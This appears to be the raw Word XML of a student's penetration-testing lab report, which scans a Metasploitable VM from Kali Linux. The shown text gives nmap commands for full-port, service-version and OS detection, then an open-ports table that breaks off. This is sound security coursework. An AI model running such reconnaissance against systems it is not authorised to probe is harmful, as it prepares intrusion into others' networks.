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101F8" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="89" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="17365D"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Network Penetration Testing with RealWorld Exploits and Security Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0573AB" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="311" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-2" w:right="-5" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="026EBF56" wp14:editId="6DAEF9A4">
                <wp:extent cx="5485765" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2892" name="Group 2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765" cy="12700"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5485765" cy="12700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5485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765">
                                <a:moveTo>
                                  <a:pt x="54857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5485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765">
                                <a:moveTo>
                                  <a:pt x="54857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2" style="width:431.95pt;height:1pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="54857,127">
                <v:shape id="Shape 33" style="position:absolute;width:54857;height:0;left:0;top:0;" coordsize="5485765,0" path="m5485765,0l0,0">
                  <v:stroke weight="1pt" endcap="flat" joinstyle="round" on="true" color="#4f81bd"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 34" style="position:absolute;width:54857;height:0;left:0;top:0;" coordsize="5485765,0" path="m5485765,0l0,0">
                  <v:stroke weight="1pt" endcap="flat" joinstyle="round" on="true" color="#4f81bd"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5233222A" w14:textId="44EB1FCE" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="190"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r w:rsidR="00AF57D2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Divakar Mandal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB28432" w14:textId="54EF99FD" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="190"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ERP: 660</w:t>
      </w:r>
      <w:r w:rsidR="00AF57D2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4682</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71862AF5" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="190"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Course: B.Tech CSE (Cybersecurity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432AED11" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="190"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Semester: 4th</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D58CF3" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="190"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Section: CY4A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8D3611" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1033"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Date: 15/05/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73602AAD" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="205"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Project Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B521C78" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BD"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281AF78B" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="543"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>This project involves performing penetration testing in a controlled lab environment to simulate real-world attacks that malicious hackers might use to exploit systems. Using Kali Linux as the attack platform and Metasploitable as the vulnerable target system, I explore various stages of ethical hacking, including reconnaissance, scanning, enumeration, exploitation, privilege escalation, and remediation. The goal is to gain hands-on experience in identifying, exploiting, and mitigating vulnerabilities responsiblities responsibly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="F8FAFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D976212" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="2170" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Theory About the Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239A0676" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="196" w:line="375" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Network penetration testing is the process of evaluating a system's security by simulating attacks from malicious outsiders and insiders. The objective is to identify security weaknesses before attackers can exploit them. The phases include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F6A000" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Reconnaissance: Gathering information about the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E65169D" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1" w:line="375" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scanning &amp; Enumeration: Actively probing the target to discover open ports, services, and vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27214D1E" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation: Gaining unauthorized access using known exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439847B2" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Post-Exploitation: Activities such as privilege escalation or data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440362A9" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1087"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Remediation: Recommending security measures to patch vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ECD5EB" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="122"/>
        <w:ind w:right="349"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Project Requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7811F" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="186"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>1.Operating Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E81598D" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="377" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4254"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali Linux (Attacking Machine) </w:t>
      </w:r>
      <w:r>
        <w:t>Metasploitable (Target Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73556783" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="185"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>2.Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E70FF02" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap: For network scanning, port discovery, OS detection, and service enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3B14A" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="918"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Framework: For exploiting known vulnerabilities in services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E53B41" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Task 1: Basic Network Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1ED826" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t> Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D56F1BD" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1080" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ nmap -v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111111"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>192.168.99.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84B887" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="818" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-2" w:right="-906" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CABF9A5" wp14:editId="1C952375">
            <wp:extent cx="6057900" cy="593725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D6DA" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Task 2: Scanning for Hidden Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEA51CC" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Steps: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A50C877" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="5163" w:firstLine="0"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ nmap -v -p- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111111"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>192.168.99.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18275067" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="006173E6">
      <w:pPr>
        <w:sectPr w:rsidR="006173E6">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1439" w:right="1806" w:bottom="2110" w:left="1802" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37444AB9" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="-410" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="207E045E" wp14:editId="1D7A3ADB">
            <wp:extent cx="5975350" cy="735774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73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63BD" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="006173E6">
      <w:pPr>
        <w:sectPr w:rsidR="006173E6">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1439" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01461CE9" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 3: Service Version Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CFC28D" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Steps: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326785FF" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="616" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>nmap -v -sV 192.168.99.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488C66DF" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="238" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-2" w:right="-963" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75309994" wp14:editId="6480C18B">
            <wp:extent cx="6092190" cy="598614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4DAE" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="129"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Task 4: Operating Version Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7EFCB" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="59" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    $ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nmap -v -O 192.168.174.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A170194" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="238" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-2" w:right="-578" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A8DD839" wp14:editId="6EACDDAB">
            <wp:extent cx="5847715" cy="645922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8BDF" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="5510"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 5: Enumeration </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Target IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:b w:val="0"/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.174.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36969C37" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 00:0C:29:B0:E7:84 (VMware)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF3B848" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Device type: general purpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F174E2" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Running: Linux 2.6.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041DA399" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OS CPE: cpe:/o:linux:linux_kernel:2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0019DF7B" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>OS details: Linux 2.6.9 - 2.6.33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F334F" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Open Ports &amp; Services:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="755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1798"/>
      </w:tblGrid>
      <w:tr w:rsidR="006173E6" w14:paraId="7B24F31B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="33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5805325" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PORT  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7026CF6" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  STATE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31AEDE3" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>SERVICE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="53204E7F" w14:textId="77777777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38F4440" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>21/tcp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3A2564" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   open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63B93482" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="56" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="1EE95843" w14:textId="77777777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9702DDD" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">22/tcp 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F9C34F3" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   open 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26A83AED" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="106B48E8" w14:textId="77777777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8EBC4B9" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">23/tcp  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7E6EADE" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  open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0CCEB4A" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="209" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="057D04E6" w14:textId="77777777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ED8A9A5" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>25/tcp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8F11614" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   open 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3E8CFEA" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="92" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>smtp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="52E3D5FB" w14:textId="77777777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831AA92" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>53/tcp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46973AA" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   open 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2C870552" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="327" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="6983B738" w14:textId="77777777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994EB0F" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>80/tcp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10A4F01" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   open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385A7CF" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="69" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> http</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="0AFBB284" w14:textId="77777777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D18C578" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>111/tcp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A5C7C8A" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">   open  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09227C00" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>rpcbind</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="03742C78" w14:textId="77777777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4FC335D" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
